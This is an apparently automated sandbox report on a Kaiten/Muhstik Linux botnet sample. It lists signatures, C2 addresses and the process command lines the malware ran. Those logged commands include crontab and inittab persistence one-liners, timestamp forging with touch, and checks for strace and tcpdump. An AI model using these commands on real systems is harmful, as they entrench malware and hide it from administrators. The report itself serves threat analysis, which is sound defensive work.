Malware Analysis Report

2024-11-15 09:40

Sample ID 220425-3xknradggj
Target pty3pejnyxxb
SHA256 7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
Tags: persistence, suricata, kaiten

Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3

Threat Level: Known bad

The file pty3pejnyxxb was found to be: Known bad.

Malicious Activity Summary

persistence suricata kaiten

Identified Kaiten Bot

Kaiten family

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

Writes file to system bin folder

Modifies hosts file

Writes DNS configuration

Writes file to user bin folder

Modifies rc script

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-25 23:53

Signatures

Identified Kaiten Bot

Description   Indicator   Process   Target
N/A           N/A         N/A       N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-25 23:53

Reported

2022-04-26 00:01

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

11949s

Max time network

156s

Command Line

[./pty3pejnyxxb]

Signatures

suricata: ET MALWARE ELF/Muhstik Botnet CnC Activity

suricata

Writes file to system bin folder

Description    Indicator      Process   Target
/bin/uname     /bin/uname     N/A       N/A
/bin/crontab   /bin/crontab   N/A       N/A
/bin/nvram     /bin/nvram     N/A       N/A

Modifies hosts file

Description   Indicator    Process   Target
/etc/hosts    /etc/hosts   N/A       N/A

Writes DNS configuration

Description        Indicator          Process   Target
/etc/resolv.conf   /etc/resolv.conf   N/A       N/A

Modifies rc script

persistence

Description     Indicator       Process          Target
/etc/rc.local   /etc/rc.local   ./pty3pejnyxxb   N/A

Writes file to user bin folder

Description        Indicator          Process   Target
/usr/bin/crontab   /usr/bin/crontab   N/A       N/A
/usr/sbin/nvram    /usr/sbin/nvram    N/A       N/A

Reads runtime system information

Description         Indicator           Process   Target
/proc/filesystems   /proc/filesystems   /bin/cp   N/A
/proc/filesystems   /proc/filesystems   /bin/cp   N/A
/proc/filesystems   /proc/filesystems   /bin/cp   N/A
/proc/filesystems   /proc/filesystems   /bin/cp   N/A

Writes file to tmp directory

Description         Indicator           Process          Target
/tmp/pty3pejnyxxb   /tmp/pty3pejnyxxb   /bin/cp          N/A
/tmp/pty3pejnyxxb   /tmp/pty3pejnyxxb   /bin/cp          N/A
/tmp/pty3pejnyxxb   /tmp/pty3pejnyxxb   /bin/cp          N/A
/tmp/pty3pejnyxxb   /tmp/pty3pejnyxxb   /bin/cp          N/A
/tmp/.bawtz         /tmp/.bawtz         ./pty3pejnyxxb   N/A

Processes

./pty3pejnyxxb

[./pty3pejnyxxb]

/bin/sh

[sh -c pidof -x strace > /dev/null]

/bin/pidof

[pidof -x strace]

/bin/sh

[sh -c pidof -x tcpdump > /dev/null]

/bin/pidof

[pidof -x tcpdump]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /tmp/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/sh

[sh -c crontab -r]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -r]

/bin/grep

[grep -v /tmp/pty3pejnyxxb]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /tmp/pty3pejnyxxb]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/pty3pejnyxxb" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c /bin/uname -n]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /dev/shm/pty3pejnyxxb]

/bin/uname

[/bin/uname -n]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /dev/shm/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/dev/shm/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /dev/shm/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep /dev/shm/pty3pejnyxxb]

/bin/grep

[grep -v /dev/shm/pty3pejnyxxb]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/dev/shm/pty3pejnyxxb" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /var/tmp/pty3pejnyxxb]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /var/tmp/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/tmp/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/tmp/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/tmp/pty3pejnyxxb]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /var/tmp/pty3pejnyxxb]

/bin/sh

[sh -c echo "0:2345:respawn:/var/tmp/pty3pejnyxxb" >> /etc/inittab2]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/bin/cat

[cat /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /var/lock/pty3pejnyxxb]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /var/lock/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/lock/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/lock/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/lock/pty3pejnyxxb]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /var/lock/pty3pejnyxxb]

/bin/sh

[sh -c echo "0:2345:respawn:/var/lock/pty3pejnyxxb" >> /etc/inittab2]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/pty3pejnyxxb /var/run/pty3pejnyxxb]

/bin/cp

[cp -f /tmp/pty3pejnyxxb /var/run/pty3pejnyxxb]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/run/pty3pejnyxxb" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/run/pty3pejnyxxb | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/pty3pejnyxxb > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v /var/run/pty3pejnyxxb]

/bin/grep

[grep /var/run/pty3pejnyxxb]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/var/run/pty3pejnyxxb" >> /etc/inittab2]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/bin/cat

[cat /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

Network

Country   Destination            Domain                          Proto
RO        89.33.194.89:8080      N/A                             tcp
GB        178.159.3.213:8080     N/A                             tcp
SG        185.201.8.176:8080     N/A                             tcp
SG        37.44.244.106:8080     N/A                             tcp
US        85.120.225.141:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
SG        194.59.165.52:8080     N/A                             tcp
SG        37.44.244.106:8080     N/A                             tcp
US        144.172.71.162:8080    N/A                             tcp
SG        37.44.244.106:8080     N/A                             tcp
SG        185.201.8.176:8080     N/A                             tcp
RO        89.33.194.89:8080      N/A                             tcp
US        144.172.71.162:8080    N/A                             tcp
US        1.1.1.1:53             oiii.deutschland-zahlung.eu     udp
US        144.172.71.162:8080    N/A                             tcp
US        144.172.71.162:8080    N/A                             tcp
US        144.172.71.162:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
RU        195.70.197.29:8080     N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
US        85.120.225.141:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
NL        67.209.115.148:8080    N/A                             tcp
SG        141.136.47.97:8080     N/A                             tcp
US        85.120.225.141:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
US        144.172.71.162:8080    N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp
SG        185.201.8.176:8080     N/A                             tcp
RO        89.33.194.89:8080      N/A                             tcp
SG        156.67.218.115:8080    N/A                             tcp

Files

N/A